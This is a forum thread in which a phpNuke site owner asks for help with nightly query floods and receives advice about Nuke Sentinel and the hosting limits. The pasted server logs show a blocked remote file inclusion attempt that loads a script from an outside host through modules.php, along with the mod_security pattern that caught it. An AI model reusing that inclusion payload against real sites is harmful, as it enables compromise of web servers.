Need some help, site SQL user getting flooded every 2 days

Fluke · Hangin' Around Joined: Oct 24, 2003 Posts: 32

Yes, they are attacking my site somehow flooding the sqluser with > 50,000 queries. Our host only support 50,000 max queries and what is happening is some ip spoof ass is constantly flooding our site. I get up in the morning and we have some funky Sql error. I try a few pages and then I get the message the user has exceeded the limit.

I have everything in Sentinnel turned up, it's also the latest version and yet they still seem to be flooding our site. Maybe I can setup Sentinnel a little further or something but even so, the last user whom I see attacking is like going to the modules.php or doing funky searches. I've already barred guests from searching...

This goes on from like 1am to almost 7am, basically just before i get up in the mornign. I have to then create yet another sql user and update the config.cfg... Getting ridiculous.

[Mon Oct 15 01:12:31 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:33 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:41 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:13:17 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:15:50 2007] [error] [client 72.30.61.80] File does not exist: /home/frontli1/public_html/files/TEKKEN5-DR.html
[Mon Oct 15 01:17:11 2007] [error] [client 194.8.176.2] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:18:33 2007] [error] [client 218.58.136.4] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:19:39 2007] [error] [client 83.130.251.189] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:24:29 2007] [error] [client 74.6.22.39] File does not exist: /home/frontli1/public_html/forums/lofiversion/index.php/t1067.html
[Mon Oct 15 01:32:03 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:04 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:07 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:09 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:11 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:13 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php

Client denied yet it seems to take down our sql user and I have to create a new one because host only allows a maximum of 50,000 queries at a time.

Also, IP lookup says it's Microsoft / MSN!!??? wtf!

Fluke · Hangin' Around Joined: Oct 24, 2003 Posts: 32

Ok, why in Admin it is saying my Sentinnel is up to date 2.5.08 when 2.5.13 is available. Can I follow the readme simply to upgrade? That's a bug I imagine since it didn't pick up a later version that fixes sql injections.... Sigh.

evaders99 · Posted: Mon Oct 15, 2007 10:33 am

Even with mod_security, looks like they are hammering your site. Even an updated Nuke Sentinel won't stop it, Sentinel requires SQL queries to function.

You'll really need to work with your host on stopping such denial of service.
Or get a better host, 50000 query limit is just not acceptable for a database-intensive script like phpNuke.

Fluke · Hangin' Around Joined: Oct 24, 2003 Posts: 32

Isn't there a way I could redirect anyone trying to hit /home/frontli1/public_html/content/modules.php directly

My understanding is that 2.5.13 is more secure than 2.5.08, yes? no? sql injection etc.

evaders99 · Posted: Mon Oct 15, 2007 3:17 pm

modules.php is the major file phpNuke uses. No way you could disable it and still have your site functioning

There are some security issues with previous versions. You should still upgrade your Nuke Sentinel version. However its flood protection will not stop the hits to your server